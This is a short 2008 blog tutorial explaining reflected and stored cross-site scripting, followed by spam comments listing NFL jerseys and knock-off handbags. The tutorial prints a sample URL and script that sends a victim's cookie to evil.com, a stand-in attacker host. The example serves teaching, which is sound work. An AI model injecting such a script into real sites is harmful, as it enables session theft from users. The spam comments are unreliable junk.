III.1.1Cross Site Scripting (XSS) | RobertoBifulco.it

III.1.1Cross Site Scripting (XSS)

Roberto Bifulco — Mon, 02/11/2008 - 15:06

In this attack an attacker injects malicious piece of code into an otherwise benign site. There are two types of XSS attack:

Reflected XSS
Stored XSS

The first is used when the attacker exploits a vulnerable Web Application that display back to the browser input parameters. Usually this happens publishing URLs that contains the attack string. Next is shown an example[8]:

http://www.trusted.com/search?keyword=<script>document.images[0].src=”http://evil.com/steal?cookie=” + document.cookie; </script>

When someone clicks on this URL, he is forwarded to the trusted.com page, but, because of the vulnerability of this web application, the code contained in the URL will be executed. Let's read this code:

<script>

document.images[0].src=”http://evil.com/steal?cookie=” + document.cookie;

</script>

This simple script makes a request to the attacker's web application, sending the user cookie as information. This way, the attacker collects personal cookies that could contain reserved informations.

Stored XSS uses the same strategy, but, instead of URLs, it uses the possibility to save content that will be shown in future by the web application, example of these applications are a wiki or a forum.

SOLUTION: XSS is an attack that can be easy avoided if the user input is sanitized. However this is not so simple to take care of all different sources of threat, and so, this is not so simple to known how to sanitize input. An interesting XSS cheat list is in [14].

Printer-friendly version

Saints Super Bowl Jersey

Saints Super Bowl Jersey (not verified) — Thu, 01/12/2012 - 02:04

Saints Super Bowl Jersey
Drew Brees Jersey
Chris Ivory Jersey
Darren Sharper Jersey
Darren Sproles Jersey
Jimmy Graham Jersey
Mark Ingram Jersey
Marques Colston Jersey
Reggie Bush Jersey
Drew Brees Womens Jersey
Darren Sproles Womens Jersey
Jeremy Shockey Womens Jersey
Jimmy Graham Womens Jersey
Mark Ingram Womens Jersey
Marques Colston Womens Jersey
Reggie Bush Womens Jersey
Chris Ivory Youth Jersey
Darren Sharper Youth Jersey
Darren Sproles Youth Jersey
Drew Brees Youth Jersey
Jeremy Shockey Youth Jersey
Jimmy Graham Youth Jersey
Lance Moore Youth Jersey
Malcolm Jenkins Youth Jersey
Mark Ingram Youth Jersey
Reggie Bush Youth Jersey
Robert Meachem Youth Jersey
Tracy Porter Youth Jersey
Archie Manning Jersey
Bobby Hebert Jersey
Cameron Jordan Jersey
Chase Daniel Jersey
Deuce McAllister Jersey
Devery Henderson Jersey
Garrett Hartley Jersey
Jabari Greer Jersey
Jeremy Shockey Jersey
Jonathan Vilma Jersey
Lance Moore Jersey
Malcolm Jenkins Jersey
Mike Bell Jersey
Morten Andersen Jersey
Patrick Robinson Jersey
Pierre Thomas Jersey
Rickey Jackson Jersey
Robert Meachem Jersey
Roman Harper Jersey
Saints Customized Jersey
Scott Fujita Jersey
Sedrick Ellis Jersey
Tracy Porter Jersey

reply

Giants Blue Jersey

49ers Red Jersey (not verified) — Thu, 01/12/2012 - 02:02

Giants Blue Jersey
Eli Manning Jersey
Tim Tebow Jersey
Von Miller Jersey
A.J. Green Jersey
Carson Palmer Jersey
Ahmad Bradshaw Jersey
Brandon Jacobs Jersey
Danny Clark Jersey
Hakeem Nicks Jersey
Harry Carson Jersey
Justin Tuck Jersey
Kenny Phillips Jersey
Kevin Boss Jersey
Lawrence Taylor Jersey
Mario Manningham Jersey
Mark Bavaro Jersey
Michael Strahan Jersey
Osi Umenyiora Jersey
Phil Simms Jersey
Plaxico Burress Jersey
Steve Smith Jersey
Tiki Barber Jersey
Champ Bailey Womens Jersey
John Elway Womens Jersey
Tim Tebow Womens Jersey
Von Miller Womens Jersey
Jay Cutler Youth Jersey
John Elway Youth Jersey
Tim Tebow Youth Jersey
Von Miller Youth Jersey
Brady Quinn Jersey
Brandon Lloyd Jersey
Brandon Marshall Jersey
Brian Dawkins Jersey
Champ Bailey Jersey
Demaryius Thomas Jersey
Dennis Smith Jersey
Eddie Royal Jersey
Elvis Dumervil Jersey
Eric Decker Jersey
Jake Plummer Jersey
Javon Walker Jersey
Jay Cutler Jersey
John Elway Jersey
John Lynch Jersey
Karl Mecklenburg Jersey
Knowshon Moreno Jersey
Kyle Orton Jersey
Ryan Clady Jersey
Selvin Young Jersey
Shannon Sharpe Jersey
Steve Atwater Jersey
Terrell Davis Jersey
Tim Tebow Jersey
Tom Jackson Jersey
Von Miller Jersey
Willis McGahee Jersey

reply

49ers Red Jersey

Saints Super Bowl Jersey (not verified) — Thu, 01/12/2012 - 02:01

49ers Red Jersey
Alex Smith Jersey
Frank Gore Jersey
Anthony Davis Jersey
Michael Crabtree Jersey
Vernon Davis Jersey
Patrick Willis Jersey
Deion Sanders Jersey
Brian Westbrook Jersey
Isaac Sopoaga Jersey
Jerry Rice Jersey
Joe Montana Jersey
Mike Iupati Jersey
Nate Clements Jersey
Nate Davis Jersey
Roger Craig Jersey
Ronnie Lott Jersey
Steve Young Jersey
Taylor Mays Jersey

reply

nfl jerseys suppliers Fashion

Anonymous (not verified) — Mon, 01/02/2012 - 07:59

nfl jerseys suppliers Fashion brand
wholesale coach bags the trend of fashion
coach outlet Don't miss the chance it's very good
coach outlet store comfortable with it
wholesale designer handbags well known great
coach handbags outlet attractive and reasonable price
cheap coach online shopping
coach outlet store may most likely need
coach handbag outlet A good thing
authentic nfl jerseys for sale fashion designed
cheap authentic nfl jerseys together with lifestyle

reply

Post new comment